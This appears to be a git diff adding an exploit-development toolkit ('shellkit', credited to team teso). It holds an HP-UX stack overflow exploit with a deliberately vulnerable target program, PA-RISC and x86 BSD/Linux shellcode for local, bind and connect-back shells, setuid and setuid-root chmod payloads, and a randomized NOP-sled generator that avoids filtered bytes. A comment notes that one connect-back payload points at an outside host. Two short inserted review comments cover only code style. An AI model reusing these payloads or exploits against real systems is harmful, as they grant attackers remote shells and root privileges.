@@ -0,0 +1,123 @@ +/* + * Sample exploit for HP-UX buffer overflows case study + */ +#include +#include + + +char shellcode[]= +"\xe8\x3f\x1f\xfd\xb4\x23\x03\xe8\x60\x60\x3c\x61\x0b\x39\x02" +"\x99\x34\x1a\x3c\x53\x0b\x43\x06\x1a\x20\x20\x08\x01\x34\x16\x03" +"\xe8\xe4\x20\xe0\x08\x96\xd6\x03\xfe/bin/shA"; + +#define BUFFER_SIZE 180 +#define STACK_DSO -84 +#define NOP 0x0b390280 +#define PAD 0 +#define ALIGN 8 +#define ADB_PATH "/usr/bin/adb" +#define VULNVAR "VULNBUF=" +#define MORE 1 + + +unsigned long get_sp(void) +{ + __asm__("copy %sp,%ret0 \n"); +} + +int main(int argc, char **argv) { +int i, dso, align, padd, buf_size, adb, more; +char *buf, *ptr; +unsigned long retaddr; + + +dso = STACK_DSO; +align = ALIGN; +padd = PAD; +buf_size = BUFFER_SIZE; +retaddr = 0; +more = MORE; + + + + +while ((i = getopt(argc, argv, + "Dd:b:r:o:a:p:m:")) != EOF) { + switch (i) { + case 'd': + dso=(int) strtol(optarg, NULL, 0); + break; + case 'm': + more+=(int) strtol(optarg, NULL, 0); + break; + case 'b': + buf_size=(int)strtol(optarg, NULL, 0); + break; + case 'r': + retaddr = strtoul(optarg, NULL, 0); + break; + case 'a': + align = (int) strtol(optarg, NULL, 0); + break; + case 'p': + padd = (int) strtol(optarg, NULL, 0); + break; + case 'D': + adb = 1; + break; + default: + fprintf(stderr, "usage: %s [-b buffer_size] [-d dso] " + "[-r return_address]" + "[-a align] [-p pad] [-D] [-m more_rets]\n", argv[0]); + exit(1); + break; + } +} + + +buf=(char *)calloc(strlen(VULNVAR) + buf_size + + sizeof(unsigned long)*more + 1, 1); +ptr=buf; +if (!buf) { + perror("calloc"); + exit(1); +} + +fprintf(stderr,"our stack %X\n",get_sp()); +if (!retaddr) + retaddr=get_sp()- dso + 3; +fprintf(stderr, "Using: ret: 0x%X pad: %i align: %i" + " buf_len: %i dso: %i more: %i\n", + retaddr, padd, align, buf_size, dso, more); + +strcpy(buf, VULNVAR); +ptr+=strlen(VULNVAR); +for(i=0;i>24)&0xff; + *ptr++=(NOP>>16)&0xff; + *ptr++=(NOP>>8)&0xff; + *ptr++=(NOP)&0xff; +} + +strcat(buf, shellcode); // 
append shellcode +ptr+=strlen(shellcode); + +for(i=0;i>24)&0xff; + *ptr++=(retaddr>>16)&0xff; + *ptr++=(retaddr>>8)&0xff; + *ptr++=(retaddr)&0xff; +} +fprintf(stderr,"buflen is %i\n", strlen(buf)); +putenv(buf,1); +if (adb) + execl(ADB_PATH,"adb","vuln", NULL); +else + execl("./vuln","vuln",buf, NULL); +perror("execl"); +return 0; // uff +} diff --git a/other/shellkit/tmp/hpux-tools/sample-one/vuln.c b/other/shellkit/tmp/hpux-tools/sample-one/vuln.c new file mode 100644 index 0000000..698af76 --- /dev/null +++ b/other/shellkit/tmp/hpux-tools/sample-one/vuln.c @@ -0,0 +1,34 @@ +/* + * Sample vulnerable program for HP-UX buffer overflows case study + */ +#include +#include + + +unsigned long get_sp(void) +{ + __asm__("copy %sp,%ret0 \n"); +} + +void baz(char *argument) { + char badbuf[200]; + + printf("badbuf ptr is: %p\n",badbuf); + strcpy(badbuf,argument); +} + +void foo(char *arg) { + + baz(arg); + +} + +int main(int argc, char **argv) { +char *param; + +printf("vuln stack is: 0x%X\n",get_sp()); +param=getenv("VULNBUF"); +foo(param); + +return 0; +} diff --git a/other/shellkit/tmp/hpux-tools/shell-one.s b/other/shellkit/tmp/hpux-tools/shell-one.s new file mode 100644 index 0000000..afbf9f8 --- /dev/null +++ b/other/shellkit/tmp/hpux-tools/shell-one.s 
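Review bot: `adb` is declared on the `int i, dso, align, padd, buf_size, adb, more;` line but assigned only inside `case 'D'`, so the `if (adb)` before the `execl` calls reads an uninitialised variable whenever `-D` is not given and the program's behaviour depends on stack garbage; add `adb = 0;` next to the other defaults (`dso = STACK_DSO;` …). `putenv(buf,1)` passes a second argument that `putenv` does not take (POSIX declares `int putenv(char *)`); it should be `putenv(buf);`. `main` begins on the preceding line of this hunk.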
@@ -0,0 +1,39 @@ + .SPACE $TEXT$ + .SUBSPA $CODE$,QUAD=0,ALIGN=8,ACCESS=44 + + .align 4 + .EXPORT main,ENTRY,PRIV_LEV=3,ARGW0=GR,ARGW1=GR +main + + bl shellcode, %r1 + nop + .SUBSPA $DATA$ + .EXPORT shellcode; So we could see it in debugger +shellcode + xor %r26, %r26, %r26; 0 - argv0 + ldil L%0xc0000000,%r1; entry point + ble 0x4(%sr7,%r1) ; + ldi 23, %r22 + +jump + bl .+8,%r1 ; address into %r1 + nop + stb %r0, SHELL-jump+7-11(%sr0,%r1) + + xor %r25, %r25, %r25; NULL ->arg1 + ldi SHELL-jump-11, %r26; + add %r1, %r26, %r26; + + ldil L%0xc0000000,%r1; entry point + ble 0x4(%sr7,%r1) ; + ldi 11, %r22; + + xor %r26, %r26, %r26; return 0 + ldil L%0xc0000000,%r1; entry point + ble 0x4(%sr7,%r1) ; + ldi 1, %r22 ; exit + +SHELL + .STRING "/bin/shA"; + +endofshellcode diff --git a/other/shellkit/tmp/hpux-tools/shell-tree.s b/other/shellkit/tmp/hpux-tools/shell-tree.s new file mode 100644 index 0000000..c3044da --- /dev/null +++ b/other/shellkit/tmp/hpux-tools/shell-tree.s @@ -0,0 +1,31 @@ + .SPACE $TEXT$ + .SUBSPA $CODE$,QUAD=0,ALIGN=8,ACCESS=44 + + .align 4 + .EXPORT main,ENTRY,PRIV_LEV=3,ARGW0=GR,ARGW1=GR +main + + bl shellcode, %r1 + nop + .SUBSPA $DATA$ + .EXPORT shellcode; So we could see it in debugger +shellcode + + bl .+4,%r1 ; address into %r1 + addi 500, %r1, %r3; + stb %r0, SHELL-shellcode+7-11-500(%sr0,%r3) + + xor %r25, %r25, %r25; NULL ->arg1 + ldi SHELL-shellcode-11-500, %r26; + add %r3, %r26, %r26; + + ldil L%0xc0000000,%r1; entry point + ldi 500, %r22 ; + ble 0x4(%sr7,%r1) ; + subi 511, %r22, %r22 ; + + +SHELL + .STRING "/bin/shA"; + +endofshellcode diff --git a/other/shellkit/tmp/hpux-tools/shell-two.s b/other/shellkit/tmp/hpux-tools/shell-two.s new file mode 100644 index 0000000..5dac10f --- /dev/null +++ b/other/shellkit/tmp/hpux-tools/shell-two.s 
@@ -0,0 +1,41 @@ + .SPACE $TEXT$ + .SUBSPA $CODE$,QUAD=0,ALIGN=8,ACCESS=44 + + .align 4 + .EXPORT main,ENTRY,PRIV_LEV=3,ARGW0=GR,ARGW1=GR +main + + bl shellcode, %r1 + nop + .SUBSPA $DATA$ + .EXPORT shellcode; So we could see it in debugger +shellcode + xor %r26, %r26, %r26; 0 - argv0 + ldil L%0xc0000000,%r1; entry point + ldi 500, %r22 ; + ble 0x4(%sr7,%r1) ; + subi 523, %r22, %r22 ; setuid(0) +jump + bl .+4,%r1 ; address into %r1 + addi 500, %r1, %r3; + stb %r0, SHELL-jump+7-11-500(%sr0,%r3) + + xor %r25, %r25, %r25; NULL ->arg1 + ldi SHELL-jump-11-500, %r26; + add %r3, %r26, %r26; + + ldil L%0xc0000000,%r1; entry point + ldi 500, %r22 ; + ble 0x4(%sr7,%r1) ; + subi 511, %r22, %r22 ; + + xor %r26, %r26, %r26; return 0 + ldil L%0xc0000000,%r1; entry point + ldi 500, %r22 ; + ble 0x4(%sr7,%r1) ; + subi 501, %r22, %r22 ; exit + +SHELL + .STRING "/bin/shA"; + +endofshellcode diff --git a/other/shellkit/tmp/hpux_bof.pdf b/other/shellkit/tmp/hpux_bof.pdf new file mode 100644 index 0000000..6d2a957 Binary files /dev/null and b/other/shellkit/tmp/hpux_bof.pdf differ diff --git a/other/shellkit/x86.c b/other/shellkit/x86.c new file mode 100644 index 0000000..dd580c6 --- /dev/null +++ b/other/shellkit/x86.c 
@@ -0,0 +1,124 @@ +/* x86.c - generic x86 functions + * + * by team teso + */ + +#include +#include +#include "shellcode.h" +#include "x86.h" + + +static unsigned long int x86_nop_rwreg (void); +static unsigned long int x86_nop_xfer (char *xferstr); + + +static unsigned long int +x86_nop_rwreg (void) +{ + unsigned long int reg; + + do { + reg = random_get (0, 7); + } while (reg == 4); /* 4 = $esp */ + + return (reg); +} + + +static unsigned long int +x86_nop_xfer (char *xferstr) +{ + int bw = 0; /* bitfield walker */ + unsigned char tgt; /* resulting instruction */ + + /* in a valid xferstr we trust */ + for (tgt = 0 ; xferstr != NULL && xferstr[0] != '\0' ; ++xferstr) { + switch (xferstr[0]) { + case ('0'): + BSET (tgt, 1, 0, bw); + break; + case ('1'): + BSET (tgt, 1, 1, bw); + break; + case ('r'): + BSET (tgt, 3, x86_nop_rwreg (), bw); + break; + case ('.'): + break; /* ignore */ + default: + fprintf (stderr, "on steroids, huh?\n"); + exit (EXIT_FAILURE); + break; + } + } + + if (bw != 8) { + fprintf (stderr, "invalid bitwalker: bw = %d\n", bw); + exit (EXIT_FAILURE); + } + + return (tgt); +} + + +unsigned int +x86_nop (unsigned char *dest, unsigned int dest_len, + unsigned char *bad, int bad_len) +{ + int walk; + int bcount; /* bad counter */ + char * xs; + char * xferstr[] = { + "0011.0111", /* aaa */ + "0011.1111", /* aas */ + "1001.1000", /* cbw */ + "1001.1001", /* cdq */ + "1111.1000", /* clc */ + "1111.1100", /* cld */ + "1111.0101", /* cmc */ + "0010.0111", /* daa */ + "0010.1111", /* das */ + "0100.1r", /* dec */ + "0100.0r", /* inc */ + "1001.1111", /* lahf */ + "1001.0000", /* nop */ + "1111.1001", /* stc */ + "1111.1101", /* std */ + "1001.0r", /* xchg al, */ + NULL, + }; + unsigned char tgt; + +/* + * XXX: those nops are only one byte long. they could be used as byte values + * in opcodes like mov (add, sub, or, ...) as value. that would increase the + * randomness of the string. 
since the value is "nop save" we have no problem + * if the execution starts within this nop. + * now, having word sized nops, even larger nops are possible (again increasssing + * the randomness of the nop string). + * however, its a little complicated ;) + */ + + for (walk = 0 ; dest_len > 0 ; dest_len -= 1 , walk += 1) { + /* avoid endless loops on excessive badlisting */ + for (bcount = 0 ; bcount < 16384 ; ++bcount) { + xs = xferstr[random_get (0, 15)]; + tgt = x86_nop_xfer (xs); + + dest[walk] = tgt; + if (badstr (&dest[walk], 1, bad, bad_len) == 0) + break; + } + + /* should not happen */ + if (bcount >= 16384) { + fprintf (stderr, "too much blacklisting, giving up...\n"); + exit (EXIT_FAILURE); + } + } + + return (walk); +} + + diff --git a/other/shellkit/x86.h b/other/shellkit/x86.h new file mode 100644 index 0000000..f902a38 --- /dev/null +++ b/other/shellkit/x86.h @@ -0,0 +1,21 @@ + +#ifndef X86_H +#define X86_H + +#define x86_TERMINATOR "\x78\x56\x34\x12" + + +/* x86_nop + * + * generate `dest_len' bytes of nopspace at `dest', which does not contain + * any of the characters in `bad', which is `bad_len' bytes long. + * + * return number of bytes generated + */ + +unsigned int +x86_nop (unsigned char *dest, unsigned int dest_len, + unsigned char *bad, int bad_len); + +#endif + diff --git a/other/shellkit/x86.o b/other/shellkit/x86.o new file mode 100644 index 0000000..5aa43d4 Binary files /dev/null and b/other/shellkit/x86.o differ diff --git a/other/shellkit/x86_bsd.c b/other/shellkit/x86_bsd.c new file mode 100644 index 0000000..1946250 --- /dev/null +++ b/other/shellkit/x86_bsd.c 
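Review bot: `random_get (0, 15)` in `x86_nop` hard-codes the index range of `xferstr`, whose size is only implied by the sixteen literals plus the NULL sentinel above it, so adding or removing an entry without touching the constant either skips candidates or dereferences the NULL and crashes in `x86_nop_xfer`. Deriving the bound from the array, `random_get (0, (int)(sizeof (xferstr) / sizeof (xferstr[0])) - 2)`, or introducing a named count, removes the coupling. The table is also rebuilt as an automatic array on every call; `static const char *const xferstr[]` states the intent and avoids that. The retry limit `16384` appears twice in the loop and its exit check and deserves a named constant so the two cannot drift apart.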
@@ -0,0 +1,73 @@
+
+#include
+#include
+#include
+#include "shellcode.h"
+#include "x86.h"
+
+
+/* ATTENTION: this must be first of concated shellcodes and the last
+ one must be terminated with x86_TERMINATOR */
+shellcode x86_bsd_spset = {
+ "x86-bsd-spset",
+ 20,
+ "\xb8\x78\x56\x34\x12\x99\xb6\x02\x5b\x53\x44\x4a"
+ "\x74\x06\x39\xc3\x74\xf3\xeb\xf4"
+};
+
+
+/* ATTENTION: connects to segfault.net at the moment */
+shellcode x86_bsd_connectsh = {
+ "x86-bsd-connectsh",
+ 66,
+ "\x31\xed\xf7\xe5\x55\x45\x55\x45\x55\xb0\x61\x55"
+ "\xcd\x80\x96\x68\xc3\x58\xb0\xca\x66\x68\x44\x44"
+ "\x66\x55\x89\xe7\x6a\x10\x57\x56\x56\x6a\x62\x58"
+ "\xcd\x80\x60\xb0\x5a\xcd\x80\x4d\x79\xf8\x52\x89"
+ "\xe3\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x60"
+ "\x5e\x5e\xb0\x3b\xcd\x80"
+};
+
+shellcode x86_bsd_portshellsh = {
+ "x86-bsd-portshellsh",
+ 73,
+ "\x31\xdb\xf7\xe3\x53\x43\x53\x43\x53\xb0\x61\x53"
+ "\xcd\x80\x96\x52\x66\x68\x44\x44\x66\x53\x89\xe5"
+ "\x6a\x10\x55\x56\x56\x6a\x68\x58\xcd\x80\xb0\x6a"
+ "\xcd\x80\x60\xb0\x1e\xcd\x80\x53\x50\x50\xb0\x5a"
+ "\xcd\x80\x4b\x79\xf6\x52\x89\xe3\x68\x6e\x2f\x73"
+ "\x68\x68\x2f\x2f\x62\x69\x60\x5e\x5e\xb0\x3b\xcd"
+ "\x80"
+};
+
+shellcode x86_bsd_execvesh = {
+ "x86-bsd-execvesh",
+ 22,
+ "\x6a\x3b\x58\x99\x52\x89\xe3\x68\x6e\x2f\x73\x68"
+ "\x68\x2f\x2f\x62\x69\x60\x5e\x5e\xcd\x80"
+};
+
+shellcode x86_bsd_exit = {
+ "x86-bsd-exit",
+ 5,
+ "\x31\xc0\x40\xcd\x80"
+};
+
+
+shellcode * x86_bsd_shellcodes[] = {
+ &x86_bsd_execvesh, /* TODO: add other shellcodes here */
+ &x86_bsd_exit,
+ &x86_bsd_portshellsh,
+ &x86_bsd_connectsh,
+ &x86_bsd_spset,
+ NULL,
+};
+
+arch x86_bsd = {
+ "x86-bsd",
+ 1,
+ x86_nop,
+ x86_bsd_shellcodes,
+};
+
+
diff --git a/other/shellkit/x86_bsd.h b/other/shellkit/x86_bsd.h
new file mode 100644
index 0000000..8a7b1ba
--- /dev/null
+++ b/other/shellkit/x86_bsd.h
@@ -0,0 +1,12 @@
+
+#ifndef X86_BSD_H
+#define X86_BSD_H
+
+#include "x86.h"
+#include "shellcode.h"
+
+arch x86_bsd;
+
+
+#endif
+
diff --git a/other/shellkit/x86_bsd.o b/other/shellkit/x86_bsd.o
new file mode 100644
index 0000000..0b42a2c
Binary files /dev/null and b/other/shellkit/x86_bsd.o differ
diff --git a/other/shellkit/x86_bsd/FIXME_chmod.s b/other/shellkit/x86_bsd/FIXME_chmod.s
new file mode 100644
index 0000000..6f19d23
--- /dev/null
+++ b/other/shellkit/x86_bsd/FIXME_chmod.s
@@ -0,0 +1,43 @@
+/* x86/BSD PIC local chmod code
+ *
+ * by stealth
+ */
+
+ .globl cbegin
+ .globl cend
+
+cbegin:
+ jmp boomsh
+
+foo: popl %ebx
+ incl (%ebx)
+ incl 4(%ebx)
+
+ xorl %eax, %eax
+ movb %al, 11(%ebx)
+
+ movb $16, %al /* chown */
+ xorl %ecx, %ecx
+ pushl %ecx
+ pushl %ecx
+ pushl %ebx
+ pushl $1
+sys_1: int $0x80
+
+ xorl %eax, %eax /* chmod */
+ movb $15, %al
+ pushw $06755
+ pushl %ebx
+ pushl $1
+sys_2: int $0x80
+
+ xorl %eax, %eax
+ incl %eax /* exit */
+ pushl $1
+sys_3: int $0x80
+
+boomsh: call foo
+ .string ".tmp.boomsh.";
+cend:
+
+
diff --git a/other/shellkit/x86_bsd/bindshell.s b/other/shellkit/x86_bsd/bindshell.s
new file mode 100644
index 0000000..8921fa9
--- /dev/null
+++ b/other/shellkit/x86_bsd/bindshell.s
@@ -0,0 +1,59 @@
+/* x86/BSD bindsh shellcode (73 bytes)
+
+ lorian / teso
+*/
+
+ .globl _cbegin
+ .globl cbegin
+ .globl _cend
+ .globl cend
+
+_cbegin:
+cbegin:
+ xorl %ebx, %ebx
+ mull %ebx
+ pushl %ebx
+ incl %ebx
+ pushl %ebx
+ incl %ebx
+ pushl %ebx
+ movb $0x61, %al
+ pushl %ebx
+ int $0x80
+ xchgl %esi, %eax
+ pushl %edx
+ pushw $0x4444
+ pushw %bx
+ movl %esp, %ebp
+ pushl $0x10
+ pushl %ebp
+ pushl %esi
+ pushl %esi
+ pushl $0x68
+ popl %eax
+ int $0x80
+ movb $0x6a, %al
+ int $0x80
+ pusha
+ movb $0x1e, %al
+ int $0x80
+a:
+ pushl %ebx
+ pushl %eax
+ pushl %eax
+ movb $0x5a, %al
+ int $0x80
+ decl %ebx
+ jns a
+ pushl %edx
+ movl %esp, %ebx
+ push $0x68732F6E
+ push $0x69622F2F
+ pusha
+ popl %esi
+ popl %esi
+ movb $0x3b, %al
+ int $0x80
+
+_cend:
+cend:
diff --git a/other/shellkit/x86_bsd/connectsh b/other/shellkit/x86_bsd/connectsh
new file mode 100644
index 0000000..f9aaab7
Binary files /dev/null and b/other/shellkit/x86_bsd/connectsh differ
diff --git a/other/shellkit/x86_bsd/connectsh.s b/other/shellkit/x86_bsd/connectsh.s
new file mode 100644
index 0000000..562f5ef
--- /dev/null
+++ b/other/shellkit/x86_bsd/connectsh.s
@@ -0,0 +1,51 @@
+/* x86/BSD connectsh shellcode (66 bytes)
+
+ lorian / teso
+*/
+
+ .globl _cbegin
+ .globl cbegin
+ .globl _cend
+ .globl cend
+
+_cbegin:
+cbegin:
+ xorl %ebp, %ebp
+ mull %ebp
+ pushl %ebp
+ incl %ebp
+ pushl %ebp
+ incl %ebp
+ pushl %ebp
+ movb $0x61, %al
+ pushl %ebp
+ int $0x80
+ xchgl %esi, %eax
+ pushl $0xcab058c3
+ pushw $0x4444
+ pushw %bp
+ movl %esp, %edi
+ pushl $0x10
+ pushl %edi
+ pushl %esi
+ pushl %esi
+ pushl $0x62
+ popl %eax
+ int $0x80
+a: pusha
+ movb $0x5a, %al
+ int $0x80
+ decl %ebp
+ jns a
+ pushl %edx
+ movl %esp, %ebx
+ push $0x68732F6E
+ push $0x69622F2F
+ pusha
+ popl %esi
+ popl %esi
+ movb $0x3b, %al
+ int $0x80
+
+_cend:
+cend:
diff --git a/other/shellkit/x86_bsd/execvesh b/other/shellkit/x86_bsd/execvesh
new file mode 100644
index 0000000..7518768
Binary files /dev/null and b/other/shellkit/x86_bsd/execvesh differ
diff --git a/other/shellkit/x86_bsd/execvesh.s b/other/shellkit/x86_bsd/execvesh.s
new file mode 100644
index 0000000..370e7a4
--- /dev/null
+++ b/other/shellkit/x86_bsd/execvesh.s
@@ -0,0 +1,31 @@
+/* x86/BSD execve /bin/sh shellcode
+ *
+ * lorian / teso
+ */
+
+/* somehow the obsd on plan9 where i tested it, needs the labels
+ * exported with _ before, while freebsd doesnt
+ */
+
+/* argv: OBSD needs a pointer to NULL, FBSD accepts NULL */
+
+ .globl cbegin
+ .globl _cbegin
+ .globl cend
+ .globl _cend
+
+_cbegin:
+cbegin:
+ pushl $0x3b
+ popl %eax
+ cdq
+ pushl %edx
+ movl %esp, %ebx
+ push $0x68732F6E
+ push $0x69622F2F
+ pusha /* FULLPOWER */
+ pop %esi
+ pop %esi
+ int $0x80
+_cend:
+cend:
diff --git a/other/shellkit/x86_bsd/exit.s b/other/shellkit/x86_bsd/exit.s
new file mode 100644
index 0000000..7993035
--- /dev/null
+++ b/other/shellkit/x86_bsd/exit.s
@@ -0,0 +1,18 @@
+/* x86/BSD exit shellcode
+ *
+ * lorian / teso
+ */
+ .globl cbegin
+ .globl _cbegin
+ .globl cend
+ .globl _cend
+
+_cbegin:
+cbegin:
+
+ xorl %eax, %eax
+ incl %eax
+ int $0x80
+
+_cend:
+cend:
diff --git a/other/shellkit/x86_bsd/spset.s b/other/shellkit/x86_bsd/spset.s
new file mode 100644
index 0000000..9bc19f4
--- /dev/null
+++ b/other/shellkit/x86_bsd/spset.s
@@ -0,0 +1,36 @@
+/* x86 spset shellcode
+ *
+ * lorian / teso
+ */
+ .globl cbegin
+ .globl _cbegin
+ .globl cend
+ .globl _cend
+
+/* searches for 512 bytes "free" space on stack without destroying it
+ * like any kind of call would do...
+ *
+ * NOTE: your real shellcode must be terminated with
+ * \x78\x56\x34\x12 for this code to work...
+ */
+
+_cbegin:
+cbegin:
+
+ movl $0x12345678, %eax
+a:
+ cdq
+ movb $0x02, %dh
+b:
+ popl %ebx
+ pushl %ebx
+ incl %esp
+ decl %edx
+ jz c
+ cmpl %eax, %ebx
+ je a
+ jmp b
+c:
+
+_cend:
+cend:
diff --git a/other/shellkit/x86_linux.c b/other/shellkit/x86_linux.c
new file mode 100644
index 0000000..d8b6398
--- /dev/null
+++ b/other/shellkit/x86_linux.c
@@ -0,0 +1,352 @@ +/* FIXME: needs cleanup -sc + */ + +#include +#include +#include +#include "shellcode.h" + + +/* ATTENTION: this must be first of concated shellcodes and the last + one must be terminated with x86_TERMINATOR */ +shellcode x86_linux_spset = { + "x86-linux-spset", + 20, + "\xb8\x78\x56\x34\x12\x99\xb6\x02\x5b\x53\x44\x4a" + "\x74\x06\x39\xc3\x74\xf3\xeb\xf4", +}; + + +shellcode x86_linux_execvesh = { + "x86-linux-execvesh", + 23, + "\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f" + "\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80", +}; + + +shellcode x86_linux_exit = { + "x86-linux-exit", + 5, + "\x31\xc0\x40\xcd\x80", +}; + + +shellcode x86_linux_setgid = { + "x86-linux-setgid", + 14, + "\x6a\x2e\x58\x66\xbb\x41\x41\x66\x81\xf3\x42\x42" + /* ^^ ^^ xor'ed with ^^ ^^ is the uid */ + "\xcd\x80", +}; + + +shellcode x86_linux_setuid = { + "x86-linux-setuid", + 14, + "\x6a\x17\x58\x66\xbb\x41\x41\x66\x81\xf3\x42\x42" + /* ^^ ^^ xor'ed with ^^ ^^ is the uid */ + "\xcd\x80", +}; + + +shellcode x86_linux_setreuid = { + "x86-linux-setreuid", + 23, + "\x6a\x46\x58\x66\xbb\x41\x41\x66\x81\xf3\x41\x41" + /* ^^ ^^ ^^ ^^ */ + "\x66\xb9\x42\x42\x66\x81\xf1\x42\x42\xcd\x80", + /* ^^ ^^ ^^ ^^ */ +}; + + +shellcode x86_linux_chmod = { + "x86-linux-chmod", + 22, + "\xeb\x0f\x31\xc0\x5b\x88\x43\x00" + /* ^^ file name length */ + "\xb9\x41\x41\x41\x41\xb0\x0f\xcd\x80\xe8\xec\xff" + /* ^^ ^^ ^^ ^^ mode */ + "\xff\xff", +}; + + +shellcode x86_linux_chroot = { + "x86-linux-chroot", + 42, + "\x99\xb9\x50\x73\x50\x73\x50\x68\x41\x41\x2e\x2e" + "\x89\xe3\xb0\x27\xcd\x80\xb0\x3d\xcd\x80\x80\xc3" + "\x02\xfe\xc2\xb0\x0c\xcd\x80\x80\xfa\x6a\x75\xf5" + "\xfe\xc3\xb0\x3d\xcd\x80", +}; + + +shellcode x86_linux_portshellsh = { + "x86-linux-portshellsh", + 94, + "\x31\xc0\x99\x50\xfe\xc0\x89\xc3\x50\xfe\xc0\x50" + "\x89\xe1\xb0\x66\xcd\x80\x52\x66\x68\x50\x73\x66" + /* ^^ ^^ */ + "\x52\x89\xe2\x6a\x10\x52\x50\x89\xe1\xfe\xc3\x89" + "\xc2\xb0\x66\xcd\x80\x80\xc3\x02\xb0\x66\xcd\x80" + 
"\x50\x52\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x89\xc3" + "\x31\xc9\xb0\x3f\xcd\x80\xfe\xc1\xb0\x3f\xcd\x80" + "\xb0\x0b\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f" + "\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80", +}; + + +shellcode x86_linux_connectsh = { + "x86-linux-connectsh", + 88, + "\x31\xc0\x99\x50\xfe\xc0\x89\xc3\x50\xfe\xc0\x50" + "\x89\xe1\xb0\x66\xcd\x80\xb9\x41\x41\x41\x41\x81" + /* ^^ ^^ ^^ ^^ */ + "\xf1\x3e\x41\x41\x40\x51\x66\x68\x50\x74\x66\x52" + /* ^^ ^^ ^^ ^^ ^^ ^^ */ + "\x89\xe1\x89\xc2\x6a\x10\x51\x52\x89\xe1\xb3\x03" + "\xb0\x66\xcd\x80\x89\xd3\x31\xc9\xb0\x3f\xcd\x80" + "\xfe\xc1\xb0\x3f\xcd\x80\xb0\x0b\x99\x52\x68\x6e" + "\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53" + "\x89\xe1\xcd\x80", +}; + + +shellcode x86_linux_read = { + "x86-linux-read", + 16, + "\xeb\x0e\xb2\xfa\x59\x6a\x41\x5b\x80\xf3\x41\x6a" + "\x03\x58\xcd\x80", +}; + + +shellcode *x86_linux_shellcodes[] = { + &x86_linux_chmod, + &x86_linux_chroot, + &x86_linux_connectsh, + &x86_linux_execvesh, + &x86_linux_exit, + &x86_linux_portshellsh, + &x86_linux_read, + &x86_linux_setgid, + &x86_linux_setuid, + &x86_linux_setreuid, + &x86_linux_spset, + NULL, +}; + + +arch x86_linux = { + "x86-linux", + 1, + NULL, /* for nops use the same function as in arch bsd */ + x86_linux_shellcodes +}; + + +int +isLegal (unsigned char x) /* XXX: Move this to a global position */ +{ + switch (x) { + case 0x00: + case 0x0a: + case 0x0d: + case 0x25: + return 0; + } + return 1; +} + + +unsigned short int +getxorer (unsigned short int value) +{ + unsigned short int xor = 0x8f8f, temp; + + + temp = (xor ^ value) & 0xff00; + switch (temp) { + case 0x0000 : + case 0x0a00 : + case 0x0d00 : + case 0x2500 : xor^=0x8000; + break; + } + + temp = (xor ^ value) & 0xff; + switch (temp) { + case 0x00 : + case 0x0a : + case 0x0d : + case 0x25 : xor^=0x80; + break; + } + + return xor; +} + + +unsigned long int +getxorer4 (unsigned long int v) +{ + unsigned long int xor = 0x8f8f8f8f, + temp, + x; + + + for (x = 0; x < 4; 
x++) { + temp = ((xor ^ v) >> (x * 8)) & 0xff; + if (!isLegal (temp)) { + xor ^= (0x80 << (x * 8)); + } + } + + return xor; +} + + +void +x86_linux_chmod_setup (unsigned char *code, unsigned char *file, + unsigned long int mode) +{ + unsigned char length = 0; + + + length = strlen (file); + if (length > 255 || !isLegal (length)) { + printf ("Change length of file name. code will be left unchanged.\n"); + return; + } + code[7] = length; + +/* XXX: WRITE ME! */ + + return; +} + + +void +x86_linux_setgid_setup (unsigned char *code, unsigned short int gid) +{ + unsigned short xor = 0; + + + xor = getxorer (gid); + + code[10] = xor & 0xff; + code[11] = (xor >> 8) & 0xff; + + gid ^= xor; + + code[5] = gid & 0xff; + code[6] = (gid >> 8) & 0xff; + + return; +} + + +void +x86_linux_setuid_setup (unsigned char *code, unsigned short int uid) +{ + unsigned short xor = 0; + + + xor = getxorer (uid); + + code[10] = xor & 0xff; + code[11] = (xor >> 8) & 0xff; + + uid ^= xor; + + code[5] = uid & 0xff; + code[6] = (uid >> 8) & 0xff; + + return; +} + + +void +x86_linux_setreuid_setup (unsigned char *code, + unsigned short int ruid, unsigned short int euid) +{ + unsigned short xor_a = 0, + xor_b = 0; + + + xor_a = getxorer (ruid); + xor_b = getxorer (euid); + + code[10] = xor_a & 0xff; + code[11] = (xor_a >> 8) & 0xff; + + code[19] = xor_b & 0xff; + code[20] = (xor_b >> 8) & 0xff; + + ruid ^= xor_a; + euid ^= xor_b; + + code[5] = ruid & 0xff; + code[6] = (ruid >> 8) & 0xff; + + code[14] = euid & 0xff; + code[15] = (euid >> 8) & 0xff; + + return; +} + + +void +x86_linux_portshell_setup (unsigned char *code, unsigned short int port) +{ + port = htons (port); + + if (!isLegal(port & 0xff) || !isLegal((port & 0xff00) >> 8)) { + printf ("Error:\t choosen port would produced illegal bytes.\n"); + printf ("\t code will be left unchanged.\n"); + return; + } + + code[22] = (port >> 8) & 0xff; + code[21] = port & 0xff; + + return; +} + + +void +x86_linux_connectshell_setup (unsigned char 
*code, + unsigned long int raddr, + unsigned short int rport) +{ + unsigned long int raddr_xor = 0; + + + rport = htons (rport); + if (!isLegal(rport & 0xff) || !isLegal((rport & 0xff00) >> 8)) { + printf ("Error:\t choosen remote port would produced illegal bytes.\n"); + printf ("\t code will be left unchanged.\n"); + + return; + } + + raddr_xor = getxorer4 (raddr); + + raddr ^= raddr_xor; + + code[22] = (raddr_xor >> 24) & 0xff; + code[21] = (raddr_xor >> 16) & 0xff; + code[20] = (raddr_xor >> 8) & 0xff; + code[19] = raddr_xor & 0xff; + + code[28] = (raddr >> 24) & 0xff; + code[27] = (raddr >> 16) & 0xff; + code[26] = (raddr >> 8) & 0xff; + code[25] = raddr & 0xff; + + code[33] = (rport >> 8) & 0xff; + code[32] = rport & 0xff; + + return; +} + + diff --git a/other/shellkit/x86_linux.h b/other/shellkit/x86_linux.h new file mode 100644 index 0000000..a145c34 --- /dev/null +++ b/other/shellkit/x86_linux.h @@ -0,0 +1,32 @@ + +#ifndef X86_LINUX_H +#define X86_LINUX_H + +#include "x86.h" +#include "shellcode.h" + +arch x86_linux; + + +void +x86_linux_chmod_setup (unsigned char *, unsigned char *, unsigned long int); + +void +x86_linux_setgid_setup (unsigned char *, unsigned short int); + +void +x86_linux_setuid_setup (unsigned char *, unsigned short int); + +void +x86_linux_setreuid_setup 